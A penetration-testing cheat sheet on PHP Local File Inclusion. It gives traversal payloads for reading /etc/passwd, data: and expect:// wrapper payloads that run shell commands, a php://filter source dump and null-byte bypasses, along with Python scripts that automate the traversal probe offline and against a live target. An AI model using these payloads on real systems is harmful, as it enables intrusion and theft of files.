LFI (Local File Inclusion)
# Identification
File inclusion vulnerabilities are usually easy to identify. The common case is a GET parameter in the URL that names the page (template, language file, module) to load:
http://www.example.com?page=login
# Exploitation
Try to include a well-known system file such as /etc/passwd on Linux. If the application prepends a directory to the value, an absolute path will not resolve; in that case keep prepending ../ until the file is reached. Surplus ../ segments above the filesystem root are harmless (/.. resolves to /), so overshooting the depth is safer than undershooting it.
http://www.example.com?page=../../../../../../etc/passwd
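The depth search above, automated. This is an added example and not code from the original page: the target filesystem is a constructed dictionary, the include base directory (PAGES_DIR) and the application layout include("pages/" . $_GET['page']) are assumptions, and the base URL / parameter name are only taken from the page's own example URL. The emulated include shows why the absolute path fails when a directory is prepended and why extra ../ above the root do not hurt.

```python
import posixpath
from typing import Callable, Optional, Tuple
from urllib.parse import urlencode
from urllib.request import urlopen

# Constructed stand-in for the target's filesystem so the example runs offline.
FAKE_FS = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    ),
    "/var/www/html/pages/login.php": "<form method=\"post\">...</form>",
}
# Assumed application layout: include("pages/" . $_GET['page']) below the docroot.
PAGES_DIR = "/var/www/html/pages"


def vulnerable_include(page: str) -> str:
    """Emulates the vulnerable include: a fixed directory is prepended to the
    untrusted value, then the path is normalised the way the kernel resolves it.
    Because of the prefix an absolute path does not resolve
    ("/var/www/html/pages//etc/passwd"), while "../" segments climb out of the
    directory and any surplus "../" above "/" are simply dropped."""
    resolved = posixpath.normpath(PAGES_DIR + "/" + page)
    return FAKE_FS.get(resolved, "Warning: include(): failed to open stream")


def find_traversal_depth(
    fetch: Callable[[str], str], target: str, marker: str, max_depth: int = 12
) -> Optional[Tuple[int, str]]:
    """Try the target path as given, then with 1..max_depth "../" prefixes.
    Returns (depth, payload) of the first response containing `marker`
    (e.g. "root:x:0:0" for /etc/passwd), or None if nothing matched."""
    for depth in range(max_depth + 1):
        payload = target if depth == 0 else "../" * depth + target.lstrip("/")
        if marker in fetch(payload):
            return depth, payload
    return None


def http_fetch(base_url: str, param: str) -> Callable[[str], str]:
    """Build a fetch() for a live target (not exercised offline). base_url and
    param are assumptions, e.g. http_fetch("http://www.example.com/", "page")."""
    def fetch(payload: str) -> str:
        url = base_url + "?" + urlencode({param: payload}, safe="/")
        with urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return fetch


if __name__ == "__main__":
    hit = find_traversal_depth(vulnerable_include, "/etc/passwd", "root:x:0:0")
    print(hit)  # (4, '../../../../etc/passwd') against the fake layout above
```

Swap vulnerable_include for http_fetch("http://target/", "page") to run it against a real parameter; the marker keeps the probe honest, since many applications return 200 with an error page for every value.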
The LFI payloads cheatsheet by @DragonJAR (see Sources) lists common *nix files to request through an LFI vulnerability.
## RCE via log poisoning
If the web server's access or error log (e.g. the Apache logs) can be included through the LFI, smuggle PHP code into a request so that it is written to the log, then include the log: PHP executes whatever PHP tags it finds in the file. The User-Agent header is the usual carrier because it is logged verbatim, whereas a payload placed in the URL path is percent-encoded by the browser before it reaches the log. Two caveats: the log must be readable by the web server's user (on Debian-based systems Apache logs are commonly root:adm with mode 0640, so www-data cannot read them), and the injected code must be syntactically valid, since one broken statement in the log makes every later include of that log fail with a parse error.
## RCE by including /proc/self/environ
If /proc/self/environ can be included, the environment of the PHP process is rendered. When PHP runs as a CGI-style process (CGI, suPHP and similar) that environment holds the CGI variables of the current request, including HTTP_USER_AGENT, so PHP code sent in the User-Agent header of the same request gets executed. Under mod_php or PHP-FPM the file is the long-lived worker's startup environment and normally contains no request headers, so the technique fails there even when the file is readable.
# Tricks
## PHP Wrappers
Inject code directly into the page with the data wrapper. This needs allow_url_include=On (since PHP 5.2.0 the data: stream counts as remote for include), and in a real request the value has to be percent-encoded; base64-encoding the body (data://text/plain;base64,...) sidesteps the special characters altogether:
http://www.example.com?page=data:text/plain,hello friend
http://www.example.com?page=data:text/plain,<?php echo shell_exec("ls")?>
Execute system commands via the expect wrapper (provided by the PECL expect extension, which is not part of a default PHP build, so this rarely works in practice):
http://www.example.com?page=expect://ls
Read a file instead of executing it by having PHP base64-encode it on the way in. This is the way to dump PHP source (swap /etc/passwd for a script name such as index.php and base64-decode the response); php://filter is a local stream, so it is not blocked by allow_url_include=Off:
http://www.example.com?page=php://filter/convert.base64-encode/resource=/etc/passwd
## Escape file extension by adding a Null Byte
Sometimes the web application appends a file extension to the requested file (i.e.: .php). Appending a percent-encoded null byte (%00) truncates the path at that point and drops the extension, because PHP before 5.3.4 passed file names to C as NUL-terminated strings; PHP 5.3.4 and later reject paths containing a null byte, so this only works on old targets. The double-encoded form %2500 is for applications that URL-decode the parameter a second time themselves (the web server's decode turns %2500 into %00, the application's turns that into the null byte).
http://www.example.com?page=/etc/passwd%00
http://www.example.com?page=/etc/passwd%2500
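The decoding chain behind the two payload forms, emulated so it can be checked offline. This is an added example, not code from the page: the target filesystem is a constructed dictionary and the application is assumed to do include($_GET['page'] . '.php') with no directory prefix.

```python
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed stand-in for the target's filesystem. Relative names resolve
# against the script's directory in PHP, so "login.php" is keyed bare here.
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
    "login.php": "<form>...</form>",
}


def include_with_extension(page: str, app_decodes_again: bool = False,
                           legacy_php: bool = True) -> Optional[str]:
    """Emulates include($_GET['page'] . '.php').
    - The web server percent-decodes the query string once, so %00 becomes a
      NUL byte and %2500 becomes the literal text "%00".
    - app_decodes_again models code that calls urldecode() on the value again,
      which is when the double-encoded %2500 is needed.
    - legacy_php=True models PHP < 5.3.4, which handed the path to C as a
      NUL-terminated string, silently dropping ".php" after the NUL.
      From 5.3.4 on include() refuses paths containing NUL (None here)."""
    value = unquote(page)
    if app_decodes_again:
        value = unquote(value)
    path = value + ".php"
    if "\x00" in path:
        if not legacy_php:
            return None
        path = path.split("\x00", 1)[0]
    return FAKE_FS.get(path)


def null_byte_variants(target: str) -> Dict[str, List[str]]:
    """Which of the page's two payload forms work against each configuration."""
    configs = {
        "legacy, single decode": dict(legacy_php=True, app_decodes_again=False),
        "legacy, double decode": dict(legacy_php=True, app_decodes_again=True),
        "php>=5.3.4": dict(legacy_php=False, app_decodes_again=False),
    }
    results = {}
    for label, kwargs in configs.items():
        results[label] = [p for p in (target + "%00", target + "%2500")
                          if include_with_extension(p, **kwargs) is not None]
    return results


if __name__ == "__main__":
    for cfg, working in null_byte_variants("/etc/passwd").items():
        print(f"{cfg}: {working or 'none'}")
```

Against a target that decodes only once, %2500 leaves a literal "%00" in the path and fails, which is why both forms are worth trying when the PHP version is unknown.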
# Sources
LFI Cheat Sheet by @Arr0way
How To Hack A Website Using Local File Inclusion (LFI) by @SunnyHoi
Local File Inclusion (LFI) — Web Application Penetration Testing by @AptiveSec
LFI payloads for *NIX environments by @DragonJAR
PHP: Supported Protocols and Wrappers - PHP Manual